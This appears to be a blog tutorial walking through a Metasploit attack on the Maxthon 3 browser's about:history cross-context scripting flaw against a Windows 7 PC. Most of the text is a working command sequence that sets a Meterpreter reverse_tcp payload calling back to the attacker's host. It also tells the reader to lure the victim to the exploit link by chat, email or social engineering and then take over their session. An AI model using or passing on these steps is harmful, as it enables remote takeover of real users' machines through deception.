Exploting Windws 7 PC using Maxthon3 about:history XCS Trusted Zone Code Execution

Cross Context Scripting (XCS) is possible in the Maxthon about:history page. Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. Please note this module only works against specific versions of XCS. Currently, we’ve only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.

Exploit Targets

Maxthon 3.1.7 build 600

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/maxthon_history_xcs

msf exploit (maxthon_history_xcs)>set payload windows/meterpreter/reverse_tcp

msf exploit (maxthon_history_xcs)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (maxthon_history_xcs)>set srvhost 192.168.1.3 (This must be an address on the local machine)

msf exploit (maxthon_history_xcs)>set uripath / (The Url to use for this exploit)

msf exploit (maxthon_history_xcs)>exploit

Now an URL you should give to your victim http://192.168.1.3:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

For More Meterpreter Commands Click Here

Leave a Reply

Your email address will not be published. Required fields are marked *